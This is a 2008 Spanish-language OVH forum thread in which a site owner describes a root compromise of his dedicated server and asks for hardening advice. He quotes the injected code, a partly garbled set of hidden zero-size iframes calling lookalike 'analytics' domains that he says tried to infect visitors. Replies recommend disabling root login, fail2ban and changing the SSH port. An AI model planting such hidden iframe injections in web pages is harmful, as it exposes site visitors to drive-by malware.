OVH Community, your new community space.

Seguridad en los servidores dedicados

Thyng

11/10/2008, 15:57

Yo que tu revisaba tu ordenador en busca de algún troyano, y los logs de FTP de ese dominio ...

neojordan

27/09/2008, 10:55

Publicado inicialmente por Gonzalo

puedes entrar por usuario pepe, y desde dentro que pepe pida privilegios de root si hace falta. Desactivar acceso a root es basico.

Conociendo joomla como lo conoczco, es lo menos malo que te han echo.

En realidad han modificado todos los archivos index.html, index.php, blank.html y frame.html de la web, incluido los del foro, solo que el foro no carga el código ese (no se por qué, pero mejor).

No es cosa de joomla, han entrado por otro sitio y no soy el único al que le pasa.

Jmanuel

27/09/2008, 08:30

Has probado a cambiar el puerto del SSH?

Gonzalo

27/09/2008, 02:25

puedes entrar por usuario pepe, y desde dentro que pepe pida privilegios de root si hace falta. Desactivar acceso a root es basico.

Conociendo joomla como lo conoczco, es lo menos malo que te han echo.

neojordan

27/09/2008, 02:10

Publicado inicialmente por Gonzalo

estas seguro que te entraron por root a la maquina ?? no te piyarian la clave de admin del joomla ??

el usuario de administrador del joomla, es "admin" ????

No, el usuario no es admin y la contraseña no es nada fácil (larga, numeros, letras, espacios, etc)

neojordan

27/09/2008, 01:41

Si desactivo el acceso como root, ¿cómo entro yo como root?
¿Cómo se desactiva el acceso como root?

Gonzalo

27/09/2008, 01:41

estas seguro que te entraron por root a la maquina ?? no te piyarian la clave de admin del joomla ??

el usuario de administrador del joomla, es "admin" ????

djbuly

26/09/2008, 21:11

En principio desactivar el acceso como root.

Además, puedes instalar fail2ban o deny-hosts para que cuando alguien se ponga a probar passwords sea baneado tras un número determinado de intentos y durante un tiempo determinado.

neojordan

26/09/2008, 18:58

Hace unas 2 o 3 semanas que me ocurrió lo siguiente:

Yo uso en mi web joomla y en el foro IPB.

Resulta que alguien o algo hace 3 semanas consiguió entrar como root en mi servidor y modificó solo los archivos de las plantillas de mi web, añadiendo al final de ellas el siguiente código:

Código HTML:

"http://yahoo-analytics.net/count.php?o=2"</span> width=0 height=0 style=<span style="color:#0000FF">"hidden"</span> frameborder=0 marginheight=0 marginwidth=0 scrolling=no></span><span style="color:#000080">"http://pinoc.org/count.php?o=2"</span> width=0 height=0 style=<span style="color:#0000FF">"hidden"</span> frameborder=0 marginheight=0 marginwidth=0 scrolling=no></span><span style="color:#000080">"http://google-analyze.org/count.php?o=2"</span> width=0 height=0 style=<span style="color:#0000FF">"hidden"</span> frameborder=0 marginheight=0 marginwidth=0 scrolling=no></span><span style="color:#000080">

Cada vez que alguien entraba en la web este código intentaba infectar su pc. Curiosamente el foro no fue modificado, solo los archivos de las plantillas de joomla.

¿Alguien sabe algo sobre este código?

¿Qué medidas de seguridad puedo instalar en mi servidor dedicado?